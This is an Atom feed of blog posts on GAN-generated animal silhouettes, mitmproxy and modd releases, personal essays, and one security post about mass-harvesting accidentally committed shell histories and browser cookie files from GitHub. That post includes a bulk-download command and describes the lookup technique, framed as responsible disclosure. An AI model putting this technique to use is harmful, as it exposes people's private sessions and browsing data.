corte.si
2020-06-30T00:00:00+00:00
https://corte.si/atom.xml
Generative zoology with neural networks
2020-06-30T00:00:00+00:00
2020-06-30T00:00:00+00:00
https://corte.si/posts/code/genzoo/
<p>A couple of years ago a paper titled <em><a href="https://arxiv.org/pdf/1710.10196.pdf">Progressive Growing of GANs for Improved
Quality, Stability, and Variation</a></em>
cropped up on my reading list. It describes growing <a href="https://en.wikipedia.org/wiki/Generative_adversarial_network">generative adversarial
networks</a>
progressively, starting with low-resolution images, and then building up more
detail as training goes on. It got quite a bit of press at the time because the
authors used their idea to generate realistic, unique images of human faces.</p>
<div class="media">
<a href="./representative_image_512x256.png">
<img src="./representative_image_512x256.png" />
</a>
<div class="subtitle">
Representative images from the <a href='https://github.com/tkarras/progressive_growing_of_gans'>Progressive GANs repo</a>
</div>
</div>
<p>Looking at these images, it seems like the neural net would have to learn a vast
number of things to be able to do what these networks were doing. Some of this
seems relatively simple and factual - say, that eye colours should match. But
other aspects are fantastically complex and hard to articulate. For instance,
what nuances are needed to link the configuration of eyes, mouth and skin
creases into a coherent facial expression? Of course, I'm anthropomorphising a
statistical machine here, and we may be fooled by our intuition - it could turn
out that there are relatively few working variations, and that the solution
space is more constrained than we imagine. Maybe the most interesting thing is
not the images themselves, but rather the uncanny effect they have on us.</p>
<p>Some time later, a <a href="http://tetzoo.com/podcast">favourite podcast of mine</a>
mentioned <a href="http://phylopic.org/">PhyloPic</a>, a database of silhouette images of
animals, plants and other lifeforms. Musing along the lines above, I wondered
what would result if you trained a system like the one in the <strong>Progressive
GANs</strong> paper on a very diverse dataset of this sort. Would you just generate
many variations of a few known animal types, or would there be enough variation
to do neural-network driven <a href="https://blogs.scientificamerican.com/tetrapod-zoology/speculative-zoology-a-discussion/">speculative
zoology</a>?
However things played out, I was pretty sure I would get a few good prints for
my study wall out of it, so I set out to satisfy my curiosity with an attitude
of open-minded experimentation.</p>
<div class="media">
<a href="./animated.mp4">
<video autoplay loop muted playsinline src="./animated.mp4"></video>
</a>
<div class="subtitle">
Training from random noise to competence
</div>
</div>
<p>I adapted the <a href="https://github.com/tkarras/progressive_growing_of_gans">code from the progressive GANs
paper</a>, and trained a
model for 12000 iterations using a Google Cloud instance with 8 NVIDA K80 GPUs
over the complete PhyloPic dataset. Total training time, including some false
starts and experiments, was 4 days. I used the final trained model to produce
50k individual images, and then spent hours poring over the results,
categorising, filtering and collating images. I also did some light editing by
flipping images to orient creatures in the same direction, because I found this
a bit more visually satisfying. This hands-on approach means that what you see
below is a sort of collaboration between me and the neural net - it did the
creative work, and I edited.</p>
<div class="media">
<a href="butterflies.png">
<img src="./butterflies-small.jpg" />
</a>
<div class="subtitle">
Flying insects
</div>
</div>
<p>The first surprising thing to me was how aesthetically pleasing the results
were. Much of this is certainly a reflection of the good taste of the artists
who produced the original data. However, there were also some happy accidents.
For instance, it seems that whenever the neural net enters uncertain territory -
whether it be fiddly bits that it hasn't quite mastered yet or complete flights
of vaguely biological fantasy - chromatic aberrations begin to enter the
picture. This is curious, because the input set is entirely in black and white,
so colour cannot be a learned solution to some generative problem. Any colour
must necessarily be a pure artefact of the mind of the machine. Delightfully,
one of the things that consistently triggers chromatic aberrations are the wings
of flying insects. This means that it generated hundreds and hundreds of
variations of evocatively-coloured "butterflies" like the ones above. I wonder
if this could be a useful observation - if you train using only black-and-white
images, but demand output in full colour, splotches of colour might be a useful
way to see where the model is still not able to accurately represent the
training set.</p>
<p>The bulk of the output is a huge variety of entirely recognisable silhouettes -
birds, various quadrupeds, reams of little gracile theropod dinosaurs,
sauropods, fish, bugs, arachnids and humanoids.</p>
<div class="media">
<a href="birds.png">
<img src="./birds-small.jpg" />
</a>
<div class="subtitle">
Birds
</div>
</div>
<div class="media">
<a href="quadrupeds.png">
<img src="./quadrupeds-small.jpg" />
</a>
<div class="subtitle">
Quadrupeds
</div>
</div>
<div class="media">
<a href="dinos.png">
<img src="./dinos-small.jpg" />
</a>
<div class="subtitle">
Dinosaurs
</div>
</div>
<div class="media">
<a href="fish.png">
<img src="./fish-small.jpg" />
</a>
<div class="subtitle">
Fish
</div>
</div>
<div class="media">
<a href="bugs.png">
<img src="./bugs-small.jpg" />
</a>
<div class="subtitle">
Bugs
</div>
</div>
<div class="media">
<a href="hominids.png">
<img src="./hominids-small.jpg" />
</a>
<div class="subtitle">
Hominids
</div>
</div>
<h2 id="stranger-things">Stranger things</h2>
<p>Once the known critters have been weeded out, we get to stranger things. One of
the questions I had going into this was whether plausible animal body plans that
don't exist in nature would emerge - perhaps hybrids of the creatures in the
input set. Well, with careful search and a helpful touch of pareidolia, I found
hundreds of quadrupedal birds, snake-headed deer and other fantastical
monstrosities.</p>
<div class="media">
<a href="mutants.png">
<img src="./mutants-small.jpg" />
</a>
<div class="subtitle">
Monstrosities
</div>
</div>
<p>Straying even further into the unkown, the model produced weird abstract
patterns and unidentifiable entities, all with a vaguely biological, "life-ish"
feel to them.</p>
<div class="media">
<a href="fractals.png">
<img src="./fractals-small.jpg" />
</a>
<div class="subtitle">
Abstract
</div>
</div>
<div class="media">
<a href="interesting.png">
<img src="./interesting-small.jpg" />
</a>
<div class="subtitle">
Unidentifiable
</div>
</div>
<h2 id="a-random-sample">A random sample</h2>
<p>What doesn't come through in the images above is the sheer abundance of
variation in the results. I'm having a number of these image sets printed and
framed, and the effect of hundreds of small, detailed images side by side at
scale is quite striking. To give some idea of the scope of the full dataset, I'm
including one of these prints below - this one is a random sample from the
unfiltered corpus of images.</p>
<div class="media">
<a href="large.png">
<img src="./large-small.jpg" />
</a>
</div>
Some personal thoughts on our national tragedy
2019-03-19T00:00:00+00:00
2019-03-19T00:00:00+00:00
https://corte.si/posts/personal/tragedy/
<div class="media">
<a href="./dunedin_mosque.jpg">
<img src="./dunedin_mosque.jpg" alt="Outside the Al Huda Mosque" />
</a>
<div class="subtitle">
Outside the Al Huda Mosque near my home (by
<a href=https://www.flickr.com/photos/mark_mcguire/46492088665>Mark McGuire</a>)
</div>
</div>
<p>A year ago, my wife and I decided to become citizens of New Zealand. Both of our
sons were born here and are full, native Kiwis. It felt odd for our family not
to have this in common, and besides, our own connection with New Zealand had
grown strong over the happy decade we'd lived here. It was time to take the
plunge. Forms were filled in, interviews were held, and we were were notified
that our citizenship ceremony would be on the 8th of February, 2018.</p>
<p>On the day, we were ushered into a hall with a podium and rows of slightly
uncomfortable stackable chairs. By the time we arrived it was already full of
our fellow soon-to-be Kiwis, along with their friends and family. Boisterous
children resisted the shushing of their parents, and there was a bit of raucous
running up and down the aisles. Nobody minded. The mood was friendly, expectant,
and happy. We took our seats next to a young Chinese couple, and behind a family
from the UK. Many were wearing splendid traditional dress from their countries
of origin - Tongan, Chinese, Thai, Indian. I myself wore a business suit,
something I only do under duress. The man in front of me's stiff posture and
occasional collar-stretching finger showed I wasn't alone. We were all there
with common purpose - because we felt the need for a deeper commitment to our
home, and perhaps a deeper sense of acceptance in turn.</p>
<p>A dapper, splendid-mustached gentleman took his place at the podium, and the
hall became silent. He began the kind of speech you would expect: a speech of
welcome, about the rights and duties of citizenship, about the solemnity of the
moment. It was at this point, in that stuffy hall, in the middle of a somewhat
monotonous civil ceremony, that I was suddenly aware of a profound connection
with the people around me. I felt, with complete clarity, a golden thread
linking me to my wife, to the couple next to us, to the gent running the
ceremony, extending outwards to everyone in the room. I felt the presence of
generations of parents, stretching back in time, working to better the lives of
their families, all their individual journeys leading us here, to this hall at
this time. Most of all, I felt the presence of our children - all our children,
the children in the room and my children, and their children, and their
children's children, all joined, facing the unknowable future. This built to a
sort of vision: a great, thronging, thrusting, golden river of humanity,
meandering over a dark background. <em>All</em> of us together, everyone that has ever
lived and everyone that ever will, shining ties binding us together each to
each, all pushing ever forward in humanity's common project. For a moment
between breaths, I was in touch with something transcendent, cosmically larger
than me, yet something of which my own small fleck of personhood was a necessary
part.</p>
<p>Afterwards, people congregated in happy, smiling groups, shaking hands and
hugging, having their first conversations as full citizens. I slipped out the
door at the back of the hall. My wife, who knows me best, followed, holding my
hand and laughing with kind-hearted amusement at how moist-eyed and emotional I
was.</p>
<p>That moment in the hall came back to me when I first read about the atrocity in
Christchurch. I saw again the open, friendly, hopeful faces of my freshly-minted
fellow citizens. I felt again the web of love that connects us all in
fundamental unity. And I was suffused with an aching and overwhelming grief.
Grief for the victims and their families, my countrymen and countrywomen. But
grief also that anyone could have a conception of humanity so small, so narrow,
and so mean as to lead to an act like this.</p>
<p>In the coming weeks I'll be doing my part in the business of reckoning with our
national tragedy, using the tools I have - code, data, and technology. We can
do much with these, but we can't go all the way. The real work will be to look
again at the human aspect our online communities, which, it has become
terrifyingly clear, have become an obstacle to recognising our common purpose.</p>
mitmproxy v1.0.0: Christmas Edition
2016-12-26T00:00:00+00:00
2016-12-26T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_1_0/
<div class="media">
<a href="http://mitmproxy.org">
<img src="./mitmweb_1_0.png" />
</a>
</div>
<p>Six years after mitmproxy's first checkin, we've finally released version
1.0.0 of the project. Our version numbering persisted below 1.0 well into
the project's maturity, for reasons that are a tad difficult to explain. My
mental model of software development is of an eternal pilgrimage - the roadmap
of possible improvements stretches on forever, and we never quite reach a point
where we look back and feel that we've arrived. From this perspective, it makes
sense for 1.0 to always be out of reach. Rather than adopting more
<a href="http://www.tex.ac.uk/FAQ-TeXfuture.html">transcendental options</a>, I've stuck
with simply incrementing the minor version with each release. This release sees
two changes in our process. First, we're committing to a much more regular
cadence, aiming for a new release every two months or so (with minor bugfix and
patch releases in between). Second, each of these releases will see a major
version number increment - this is v1.0, we'll release v2.0 by the end of
February, and so forth. This retains something of the flavor of our previous
eccentric version numbering strategy by de-emphasizing major version increments
as flagfall events, without being as restrictive. Let the pilgrimage continue.</p>
<p>The project's momentum continues to be excellent - since the last release,
we've had 459 commits by 10 contributors, resulting in 104 closed issues and
172 closed PRs, all in just over 70 days. All this activity has resulted in a
number of very significant developments.</p>
<p>Over the last year, we've done a huge amount of work converting the project
from Python 2 to Python 3. Our previous release straddled the two versions,
retaining compatibility with Python 2.7. This release is strictly Python3-only.
We are now well positioned to take full advantage of things like optional type
checking, the new asyncio module and the many small and large interface
improvements that Python 3 brings.</p>
<p>Our user interfaces continue to improve by leaps and bounds. The console
interface now has a much cleaner core, sports a number of new features like
flow ordering, and has seen significant speed improvements. We're also finally
releasing something we've been cooking up for quite a while - mitmweb, a web
interface to mitmproxy. It's doesn't have feature parity with the console tool
yet, but we feel it's ready to step onto the stage as one of our primary
interfaces. Since mitmproxy console doesn't run on Windows (yet), mitmweb is
the best GUI option for our Windows users for now. We're also improving our
distribution mechanisms on Windows, with a new installer package kindly
provided by <a href="http://bitrock.com/">BitRock</a>. These two developments together
mean much better support for our Windows users.</p>
<p>At a protocol level, we're happy to announce that our support for Websockets is
now mature, and enabled by default. For the moment, the best way to interact
with Websockets traffic is to use our scripting mechanism - we will have
support in the GUIs very soon. On the HTTP/2 front, the news is mixed. We're
very happy with the quality of our own implementation of the protocol, but
we've discovered that some server implementations still have problems with
certain protocol edge cases. Over the last few months we found multiple bugs
affecting some very prominent websites and CDNs. We are working closely with
the affected companies to get these issues fixed - but big wheels turn slowly,
especially when it comes to business-critical infrastructure, and all the
needed repairs haven't been rolled out yet. This has left us in a bit of a
quandary - we know that fixes for these issues are imminent, and we believe
that the particular problems are idiosyncratic and shouldn't prompt a
redevelopment of our core to make us bug-for-bug compatible. None the less, the
effect is that mitmproxy's HTTP2 implementation will currently do unexpected
things when talking to large sites like Twitter and Reddit. We've decided to
disable HTTP/2 by default for this release - you can explicitly re-enable it
using the <em>--http2</em> flag.</p>
<p>Finally, if you're interested in hacking on mitmproxy, now is an excellent time
to join us. Contributing is simple - pick one of the issues that we've tagged
as <a href="https://github.com/mitmproxy/mitmproxy/issues?q=is%3Aissue+is%3Aopen+label%3Agood-first-contribution">good first
contributions</a>,
join us on <a href="https://slack.mitmproxy.org/">Slack</a> to discuss your approach, and
then send a PR.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>All mitmproxy tools are now Python 3 only! We plan to support Python 3.5 and higher.</li>
<li>Web-Based User Interface: Mitmproxy now offically has a web-based user
interface called mitmweb. We consider it stable for all features currently
exposed in the UI, but it still misses a lot of mitmproxy’s options.</li>
<li>Windows Compatibility: With mitmweb, mitmproxy is now useable on Windows. We
are also introducing an installer (kindly sponsored by BitRock) that
simplifies setup.</li>
<li>Configuration: The config file format is now a single YAML file. In most cases,
converting to the new format should be trivial - please see the docs for
more information.</li>
<li>Console: Significant UI improvements - including sorting of flows by
size, type and url, status bar improvements, much faster indentation for
HTTP views, and more.</li>
<li>HTTP/2: Significant improvements, but is temporarily disabled by default
due to wide-spread protocol implementation errors on some large website</li>
<li>WebSocket: The protocol implementation is now mature, and is enabled by
default. Complete UI support is coming in the next release. Hooks for
message interception and manipulation are available.</li>
<li>A myriad of other small improvements throughout the project.</li>
</ul>
mitmproxy v0.18
2016-10-17T00:00:00+00:00
2016-10-17T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_18/
<p>We've just released <a href="https://github.com/mitmproxy/mitmproxy/releases/tag/v0.18.1">mitmproxy
v0.18</a>! Since the
last release, the project has had 1399 commits by 40 contributors, resulting in
217 closed issues and 305 closed PRs, all of this in just over 189 days.</p>
<p>This release is notable for a number of reasons.</p>
<p>First, it contains significant contributions from our three excellent
<a href="https://developers.google.com/open-source/gsoc/">GSOC</a> students this year.
Shadab Zafar worked on Python 3 compatibility and a number of aspects of
mitmproxy's core. Clemens Brunner and Jason Hao made major improvements to
mitmweb, the upcoming web-based interface to mitmproxy. We loved working with
these guys, and hope that they will continue to hack on mitmproxy.</p>
<p>Second, the project has seen some significant internal reorganisation.
Previously, we were split over three separate repositories (mitmproxy, netlib
and pathod). Over time, the practical headaches of keeping everything
synchronised started taking a toll, and we decided to amalgamate it all in a
single repo. The most immediate external effect is that installing mitmproxy
(through, say, "pip install mitmproxy") now gets you all of the associated
tools and libraries, including pathod and pathoc.</p>
<p>Finally, 0.18 will be the last major version of mitmproxy compatible with
Python 2. The next release will target Python 3.5 only, with all of the 2/3
compatibility cruft stripped out. This is not a decision we took lightly - we
have a significant community of developers that have tools based on mitmproxy,
and we realise this might be painful for some of them. We feel that being able
to use the full features of Python 3.5 will make the transition worth it. If
you have a library or tool based on mitmproxy, you should start planning for a
conversion now. We'd be very happy to help you navigate the transition, so feel
free to drop by the <a href="https://slack.mitmproxy.org/">Slack channel</a> to chat to
the dev team.</p>
<h2 id="changelog">Changelog</h2>
<ul>
<li>Python 3 Compatibility for mitmproxy and pathod (Shadab Zafar, GSoC 2016)</li>
<li>Major improvements to mitmweb (Clemens Brunner & Jason Hao, GSoC 2016)</li>
<li>Internal Core Refactor: Separation of most features into isolated Addons</li>
<li>Initial Support for WebSockets</li>
<li>Improved HTTP/2 Support</li>
<li>Reverse Proxy Mode now automatically adjusts host headers and TLS Server Name Indication</li>
<li>Improved HAR export</li>
<li>Improved export functionality for curl, python code, raw http etc.</li>
<li>Flow URLs are now truncated in the console for better visibility</li>
<li>New filters for TCP, HTTP and marked flows.</li>
<li>Mitmproxy now handles comma-separated Cookie headers</li>
<li>Merge mitmproxy and pathod documentation</li>
<li>Mitmdump now sanitizes its console output to not include control characters</li>
<li>Improved message body handling for HTTP messages:
<ul>
<li>.raw_content provides the message body as seen on the wire</li>
<li>.content provides the decompressed body (e.g. un-gzipped)</li>
<li>.text provides the body decompressed and decoded body</li>
</ul>
</li>
<li>New HTTP Message getters/setters for cookies and form contents.</li>
<li>Add ability to view only marked flows in mitmproxy</li>
<li>Improved Script Reloader (Always use polling, watch for whole directory)</li>
<li>Use tox for testing</li>
<li>Unicode support for tnetstrings</li>
<li>Add dumpfile converters for mitmproxy versions 0.11 and 0.12</li>
<li>Numerous bugfixes</li>
</ul>
<h2 id="contributors-for-this-release">Contributors for this release</h2>
<ul>
<li>Aldo Cortesi</li>
<li>Angelo Agatino Nicolosi</li>
<li>BSalita</li>
<li>Brett Randall</li>
<li>Christian Frichot</li>
<li>Clemens Brunner</li>
<li>Cory Benfield</li>
<li>Doug Freed</li>
<li>Drake Caraker</li>
<li>Felix Yan</li>
<li>Israel Blancas</li>
<li>Jason</li>
<li>Jason Pepas</li>
<li>Jonathan Jones</li>
<li>Kostya Esmukov</li>
<li>Linmiao Xu</li>
<li>Manish Kumar</li>
<li>Maximilian Hils</li>
<li>Ryan Laughlin</li>
<li>Sachin Kelkar</li>
<li>Sanchit Sokhey</li>
<li>Schamper</li>
<li>Shadab Zafar</li>
<li>Steven Noble</li>
<li>Steven Van Acker</li>
<li>Tai Dickerson</li>
<li>Thomas Kriechbaumer</li>
<li>Tyler St. Onge</li>
<li>Vincent Haupert</li>
<li>Wes Turner</li>
<li>Yoginski</li>
<li>Zohar Lorberbaum</li>
<li>arjun</li>
<li>chhsiao</li>
<li>jpkrause</li>
<li>phackt</li>
<li>redfast</li>
<li>smill</li>
<li>strohu</li>
<li>vulnminer</li>
</ul>
Hobbes
2016-03-22T00:00:00+00:00
2016-03-22T00:00:00+00:00
https://corte.si/posts/personal/hobbes/
<div class="media">
<a href="./hobbes.jpg">
<img src="./hobbes.jpg" />
</a>
</div>
<p>Eight years ago my wife and I walked into the <a href="https://www.catprotection.org.au/">Cat Protection
Society</a> near our house in Sydney on a whim -
just to look, we assured each other, and <em>most definitely</em> not to get another
cat. Thirty minutes later we emerged with a box containing a tiny ball of
scraggly orange fluff, a wee kitten we immediately named Hobbes. Circumstances
had taken Hobbes away his mother far too early, and since I was able to work
from home at the time the job of playing surrogate largely fell to me. I fed
him, let him perch on my shoulder like a fluffy little malodorous parrot while
I worked, and cleaned him with a cotton bud after his inept attempts to use the
litter tray. He grew from a tiny scrap to a mischievous and energetic kitten,
and then to a somewhat slothful but very handsome boy. Perhaps because he came
to us so young, Hobbes never got on with other cats. He preferred the company
of humans, and considered himself to be as much of a person as anyone else. The
photo above is him in his natural habitat: draped bonelessly over my lap like a
purring orange throw-rug, just being part of whatever conversation his humans
are having.</p>
<p>About a year ago, Hobbes started losing weight. Truth be told shedding a few
pounds would probably have done him good, but this was unexplained by any
change in his diet. After a series of X-rays and a biopsy we got bad news: he
had lymphoma. With chemotherapy he would have a year or so of high-quality life
left, but likely not much more. Apart from giving him his daily pills, there
was not much we could do. We treated him to his favorite food as often as
seemed sensible, and watched carefully for the moment when the scales tipped
and discomfort outweighed the joy in his life.</p>
<p>This morning Zoe and I took Hobbes to the vet one last time. He always hated
being in the cat carrier, and would pace, tense and wide-eyed, ready to spring
out like a jack-in-the-box when we opened the door. Today, he just seemed tired
and sore, huddled motionlessly in an uncomfortable-looking crouch. We held him
together as the vet gave him two injections - one to send him gently to sleep,
and shortly after, another to stop his heart. Afterwards we brought him home
and buried him under a cherry tree in our garden. Perhaps when spring comes, it
will flower orange.</p>
<p>Goodbye, Hobbesy. Your family will miss you. You were a good, good boy.</p>
modd: a flexible tool for responding to filesystem change
2016-02-11T00:00:00+00:00
2016-02-11T00:00:00+00:00
https://corte.si/posts/modd/announce/
<p>I've just released <a href="https://github.com/cortesi/modd">modd</a>, a new<sup class="footnote-reference"><a href="#1">1</a></sup> project of
mine. Like its sister project <a href="https://github.com/cortesi/devd">devd</a>, it's
distributed as a single, self-contained binary for all major platforms - <a href="https://github.com/cortesi/modd/releases">get it
while it's fresh</a>.</p>
<p>Modd is a simple tool that's hard to explain pithily. It triggers commands and
manages daemons in response to filesystem changes - but that is a
technically-correct mouthful that doesn't really convey how it is used. Part of
the problem is that it is extremely flexible. In my projects it runs linters,
does live code compiles, manages infrastructure daemons like databases, runs
test instances of projects and is even rendering and live-reloading this blog
post as I type. Modd replaces parts of tools like <a href="http://gulpjs.com/">Gulp</a>,
<a href="http://gruntjs.com/">Grunt</a>, <a href="https://ddollar.github.io/foreman/">Foreman</a> and
<em>make</em>, but it can also augment them. For instance, one of my projects is
entirely driven by a Makefile, with tasks invoked by modd on change.</p>
<p>At modd's core is a a file change detection library that tries to get things
right for most developer work patterns. It handles temporary files, VCS
directories and many <a href="https://twitter.com/cortesi/status/661316050542329856">pathological behaviors shown by common
editors</a> correctly (or
at least tries really hard to). The change detection algorithm waits for a lull
in activity, so that jobs aren't triggered in the middle of progressive
processes like renders and compiles that may touch many files. The result is
change detection that is less surprising and more consistent than similar
projects out there. The output of the change detection algorithm is then hooked
up to a very flexible way to specify commands and manage daemons, letting you
specify shell scripts that trigger on file match patterns in a single config
file. Finally, there are a few mod-cons. A custom <a href="https://github.com/cortesi/termlog">terminal logging
module</a> lets modd sensibly interleave the
output of possibly concurrent daemons and commands, with headings showing which
command was responsible for what. Modd also has support for desktop
notifications (<a href="http://growl.info/">Growl</a> on OSX,
<a href="https://developer.gnome.org/libnotify/">libnotify</a> on Linux), letting you see
things like linter output and compile editors immediately.</p>
<p>Below, I'm going to show one quick example of how I use modd to do a live
build/compile cycle for <a href="https://github.com/cortesi/devd">devd</a>, a pretty
standard Go project. In a future post, I'll show how I've replaced Gulp
entirely for a Javascript-heavy front-end project.</p>
<p>Please see the <a href="https://github.com/cortesi/modd">modd documentation</a> for a
complete explanation of the syntax and for more examples.</p>
<h2 id="test-compile-cycle-for-go">Test-compile cycle for Go</h2>
<p>On startup, modd looks for a file called <em>modd.conf</em> in the current directory.
This file has a simple but powerful syntax - one or more blocks of commands,
each of which can be triggered on changes to files matching a set of file
patterns. Commands have two flavors: <strong>prep</strong> commands that run and terminate
(e.g. compiling, running test suites or running linters), and <strong>daemon</strong>
commands that run and keep running (e.g databases or webservers). Daemons are
restarted when their block is triggered, after all prep commands have run
successfully. Commands are embedded shell scripts, so shell features like
redirection work, and compound, multi-step commands are common.</p>
<p>Here is the simple <strong>modd.conf</strong> I use to drive the test cycle for
<a href="https://github.com/cortesi/devd">devd</a>:</p>
<pre style="background-color:#2b303b;">
<code>**/*.go {
prep: go test @dirmods
}
**/*.go !**/*_test.go {
prep: go install ./cmd/devd
daemon +sigterm: devd -ml ./tmp
}
</code></pre>
<p>After the <em>modd</em> command, the commands execute for the first time, and modd is
then ready to respond to changes. The initial output looks like this:</p>
<div class="media">
<a href="modd-devd.png">
<img src="modd-devd.png" />
</a>
</div>
<p>The config file does three things:</p>
<ul>
<li>When any .go file changes, it runs "go test" on the affected module.</li>
<li>When a non-test file changes, it compiles and installs devd.</li>
<li>It keeps a test instance of the devd daemon running, and restarts it with a
SIGTERM when needed.</li>
</ul>
<p>The one subtlety here is the <strong>@dirmods</strong> tag, which is replaced with a
shell-escaped list of all directories that contain modified files. There's a
similar tag - <strong>@mods</strong> - that is replaced with all matching modified files.
When first run, both of these tags are replaced by all possible matches - that
is, all directories containing matching files, and all matching files
respectively. This means that the test suite for all the Go modules in the
project is run on startup, and only for modified modules after that.</p>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>In fact, this is <a href="https://github.com/cortesi/modd/blob/master/CHANGELOG.md">release
v0.2</a>, which slipped
in before I had time to announce v0.1 on my blog.</p>
</div>
mitmproxy v0.15
2015-12-04T00:00:00+00:00
2015-12-04T00:00:00+00:00
https://corte.si/posts/code/mitmproxy/announce_0_15/
<div class="media">
<a href="http://mitmproxy.org">
<img src="../announce_0_12_1/mitmproxy_0_12_1.gif" />
</a>
</div>
<p>We've just released <a href="http://www.mitmproxy.org">mitmproxy 0.15</a>. This is
primarily a bugfix release, but with a few really juicy long-demanded features
thrown in:</p>
<ul>
<li>Support for loading and converting older dumpfile formats (0.13 and up)</li>
<li>Content views for inline script (@chrisczub)</li>
<li>Better handling of empty header values (Benjamin Lee/@bltb)</li>
<li>Fix a gnarly memory leak in mitmdump</li>
<li>A number of bugfixes and small improvements</li>
</ul>
<p>Behind the scenes, there has been a bunch of other exciting developments. The
effort to port mitmproxy and its underlying libraries to Python3 continues
apace. Our automated build and testing infrastructure has improved hugely - we
now have <a href="http://snapshots.mitmproxy.org">up-to-date binary snapshots built for each
commit</a>.</p>
<p>Thanks to all the contributors who helped get this release out the door, and,
as usual, special thanks to my invaluable co-maintainer
<a href="https://maximilianhils.com/">Max</a>, who's been steering things while I've been
kept busy with other things.</p>
Trawling Github for cookies, bookmarks and browsing history
2015-11-26T00:00:00+00:00
2015-11-26T00:00:00+00:00
https://corte.si/posts/hacks/github-browserstate/
<p>It's a universal rule that search over a sufficiently large body of user data
poses security challenges. This follows naturally from the fact that humans -
even smart, informed, careful humans - occasionally slip up. Given enough data,
and the ability to pick out slip-ups with search, there will always be rich
pickings for a malefactor. I wrote a short series of posts a while ago about
interesting things I found on Github - <a href="https://corte.si/posts/hacks/github-shhistory/">commands from shell history
files</a>, <a href="https://corte.si/posts/hacks/github-pipechains/">common pipe
chains</a>, and words from <a href="https://corte.si/posts/hacks/github-spellingdicts/">custom
spell-check dictionaries</a>. While
shell history files could definitely contain very sensitive information, in
practice there were only a handful of really damaging issues in the dataset.
Trawling around people's dotfile directories, I found that something much more
damaging often made it into repos: browser state. It's easy to see how this
could happen - it takes just one injudicious add of a hidden directory to
expose cookies, browser history, bookmarks and more. I decided to return to
this issue later, and it slipped off my radar until recently.</p>
<p>When I wrote the first series of posts, I also released a <a href="https://github.com/cortesi/ghrabber">tiny tool called
ghrabber</a> (just a hack, really) that lets
you grab files from Github en-masse using a Github code search query. The first
thing I noticed when I picked it up again is that it no longer worked as
expected. I used to be able to retrieve all files matching a path, like so:</p>
<pre style="background-color:#2b303b;">
<code><span style="color:#c0c5ce;"> </span><span style="color:#bf616a;">ghrabber.py </span><span style="color:#c0c5ce;">"</span><span style="color:#a3be8c;">path:.bash_history</span><span style="color:#c0c5ce;">"
</span></code></pre>
<p>Today, this returns an error - Github now requires you to specify both a search
term <strong>and</strong> a path<sup class="footnote-reference"><a href="#1">1</a></sup>. There are all sorts of possible explanations for this
change, but I like to think that it's meant to prevent (or at least impede)
exactly the kind of trawling I've been amusing myself with.</p>
<p>Let's say we want to search for Firefox browser profile cookies. These are
stored in a SQLite file called "cookie.sql". Github doesn't index binary files
for search, so we can't search for characteristic content in the file. Path
specification is broken, so we can't search for the filename. Stumped, right?
Not so fast - the cookie files live in a directory with a large number of
associated non-binary files. If we could come up with a signature for one of
these accompanying files, then we could download a path relative to the match
to retrieve the cookie storage file itself. I quickly <a href="https://github.com/cortesi/ghrabber/commit/9b7909ccd594168ab8eb3d44834055b510e90273">added a flag to do
exactly this to
ghrabber</a>,
and cooked up appropriate query strings to detect Firefox and Chrome browser
profiles. I'll elide those here, for obvious reasons.</p>
<h2 id="a-look-at-the-data">A look at the data</h2>
<p>The result was <strong>708</strong> distinct browser profiles that included <strong>33 364</strong>
bookmarks, and <strong>88 013</strong> cookies. Many of these profiles are actually
intentional checkins - testing trusses, blank profiles and so forth. However,
some totally unscientific manual sampling indicates that just less than half of
these are probably genuine accidental checkins, containing private information.</p>
<p>Let's take a light, high-level look at the data. The figure below shows the
percentage of profiles with cookies from each TLD:</p>
<figure>
<img class="img-responsive center-block" src="./cookies.png"/>
<figcaption class="text-center">Percentage of profiles with cookies from domain</figcaption>
</figure>
<p>As expected, the stats here are dominated by the mega-trackers that infest
almost every site on the internet - a familiar cast of rogues including
DoubleClick, Scorecard Research, Quantserve and so forth. It's sad to see how
few domains here are genuine destinations - apparently the top sites for this
sample are Google, YouTube, Github (not unexpectedly), and Twitter.</p>
<p>Next up is the percentage of profiles with bookmarks for a given domain:</p>
<figure>
<img class="img-responsive center-block" src="./bookmarks.png"/>
<figcaption class="text-center">Percentage of profiles with bookmarks for domain</figcaption>
</figure>
<p>Here, the top domains are those pre-seeded on install, particularly with
Firefox. This explains the Mozilla domains as well as ubuntu.com, debian.org
and launchpad.net. Once we're outside of this list, the "genuine destinations"
match the cookie dataset quite well - YouTube, Github, Wikipedia, and so forth.</p>
<h2 id="a-difficult-situation">A difficult situation</h2>
<p>The surprise here is not that people accidentally check sensitive information
into git repos. The real surprise is just how much of a pain in the butt it was
to responsibly address the issue. At the end of this little experiment, I had
more than 700 repositories that potentially contained sensitive, accidentally
exposed user information. It beggars belief, but it's 2015 and the most popular
repository hosting service in the world <a href="https://github.com/isaacs/github/issues/37">has <strong>no way</strong> to privately report a
bug against a repo</a>. One could
create a public bug report for each repository in question - but that would be
like hanging out a neon sign saying "privacy issue here" for others to find,
particularly since bug reports are published in a user's activity stream.</p>
<p>In the end, I decided to directly notify as many people as I could by email.
So, I wrote a script that checked each affected user's profile for an email
address. That left me with 120-odd users with contact details. I manually
whittled these down to repositories that were obviously accidental checkins and
sent them each an email, resulting in a dozen or so responses with variations
on "oops, thanks for letting me know".</p>
<h2 id="hey-github">Hey Github!</h2>
<p>I have two recommendations for Github that would make this situation vastly,
vastly better:</p>
<ul>
<li>
<p>Add a mechanism that lets users report private bugs, visible only to the repo
owners. There's just no excuse for the lack of a feature like this.</p>
</li>
<li>
<p>Consider restricting search functionality somewhat. One option would be not
to index dotfiles (.*) by default, and perhaps let users opt in to dotfile
indexing on a per-repo basis. The vast majority of accidental checkins are
either within dotfiles (shell history, for example), or within directories
that start with leading dots (browser history, ssh config)</p>
</li>
</ul>
<div class="footnote-definition" id="1"><sup class="footnote-definition-label">1</sup>
<p>In fact, Github search path specifications seem to be broken now in a
more general way, but that's beside the point for this post.</p>
</div>
devd v0.3
2015-11-12T00:00:00+00:00
2015-11-12T00:00:00+00:00
https://corte.si/posts/devd/0.3/
<div class="media">
<a href="https://github.com/cortesi/devd">
<img src="../intro/devd-terminal.png" />
</a>
</div>
<p>I've just released <a href="https://github.com/cortesi/devd/releases">devd 0.3</a> - a
measured increment, with a modest set of bugfixes and new features. This is
inline with my <a href="https://corte.si/posts/devd/0.2/">broad plan to keep devd a small, dependable, and focused
tool.</a> Everyone should update.</p>
<ul>
